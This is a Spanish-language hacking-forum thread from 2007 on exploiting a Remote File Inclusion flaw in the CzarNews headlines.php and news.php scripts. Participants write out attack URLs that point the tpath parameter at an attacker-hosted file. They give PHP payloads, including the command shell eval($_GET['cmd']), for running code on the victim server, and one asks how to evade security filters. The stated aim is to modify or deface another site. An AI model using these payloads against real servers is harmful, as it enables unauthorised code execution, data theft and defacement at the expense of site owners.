Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Rienzi en 20 Agosto 2007, 13:53 pm



Título: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 13:53 pm
Saludos!! me gustaría comprender el funcionamiento del siguiente Exploit!!

http://www.securityfocus.com/bid/12857/exploit

Que debería hacer?¿? crear un archivo config en mi host y de ahí enlazarlo de la siguiente manera?

http://www.Victima.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.host.org/cn_config.php

También me gustaría saber si con esa vulnerabilidad podría cambiar el index o modificarlo un saludo.


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 14:22 pm
Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.

PD: Date una vuelta por Google (http://www.google.es/search?hl=es&q=%22remote+file+inclusion%22&btnG=Buscar&meta=lr%3Dlang_es).


Título: Re: [?] File include
Publicado por: WannaBeHacker en 20 Agosto 2007, 14:28 pm
Citar
http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php

http://www.example.com/research/news/CzarNewsv113b/news.php?tpath=http://www.example.org/cn_config.php

Mmm, se supone que sería así no???

Por ejemplo:

http://www.PÁGINAVULNERABLE.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.TUSHELL.org/cn_config.txt?




Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 14:50 pm
pero que tipo de shell debería utilizar? conocen algún tutorial en Español para poder saber mas sobre esta vulnerabilidad ? Que podría hacer con ella??? ya e buscado por google y me aparecen vulns de otros tipos y una pila de cosas en árabe de todas formas probare esta tarde jejeje gracias por vuestra ayuda!!


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 14:55 pm
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código
  1. <?php phpinfo(); ?>


Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 16:36 pm
y una vez con el Exploit listo que utilidad puedo darle?? modificar la configuracion de la web???


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 16:54 pm
Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.


Título: Re: [?] File include
Publicado por: Distorsion en 20 Agosto 2007, 17:03 pm
Aprovecho este post para preguntar una duda. Segun que paginas tienen modulos de seguridad como el php nuke que filtran las peticiones. He probado a ponerlo en ehadecimal en la url el RFI pero lo pilla igual es algo que se tiene en cuenta, la codificacion de caracteres. Sabeis alguna manera de saltarse el filtrado o alguna codificacion poco conocida y no implementada en los modulos de seguridad?¿
Saludos


Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 17:26 pm
ah ok muchisimas gracias , la shell deberia estar en php no? conoces de alguna ya hecha para que me haga mas o menos una idea de como seria la indicada para explotarla?¿


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 17:43 pm
Citar
https://foro.elhacker.net/index.php/topic,174536.0.html


Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 18:15 pm
muchisimas gracias!!!!


Título: Re: [?] File include
Publicado por: WannaBeHacker en 20 Agosto 2007, 18:37 pm
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código
  1. <?php phpinfo(); ?>

Pero si se supone que quieres que te funcione una shell por ejemplo , no tedría que ser
http://www.example.org/cn_config.txt? ??


Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 18:38 pm
otra cosa , cual de todas las shells deberia funcionar en dicha vulnerabilidad ?? todas sirvirian?  deberia renombrarlas al igual que aparecen en security focus???
es normal que de error 500 al intentar ejecutarla¿? un saludo.


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 20:38 pm
WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.

Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene:

Código
  1. <?php phpinfo(); ?>

Obtendremos como resultado la información de nuestro servidor, ya que
estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor.

En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones.


Título: Re: [?] File include
Publicado por: Rienzi en 20 Agosto 2007, 20:57 pm
jejeje muchas gracias por responder ahora cuando uso el

Código:
<?php
echo "<?php phpinfo(); ?>";
?>

me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas).
Porcierto de que manera podria enviar comandos directamente? asi
www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ???

Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos.


Título: Re: [?] File include
Publicado por: yeikos en 20 Agosto 2007, 21:27 pm
Cita de: archivo.txt
<?php
eval($_GET['cmd']);
?>

Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo.


Título: Re: [?] File include
Publicado por: WannaBeHacker en 20 Agosto 2007, 23:55 pm
Yeikos, muchísimas gracias por tu tiempo y tu explicación.
Por cierto, es que a mí este bug también me salto con el SSS hace un tiempo cuando realizé un scan, puede ser que el scan fuera un falso positivo verdad? Porque realizo el RFI y no ocurre nada... O que este fixeado???


Título: Re: [?] File include
Publicado por: yeikos en 21 Agosto 2007, 00:09 am
Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.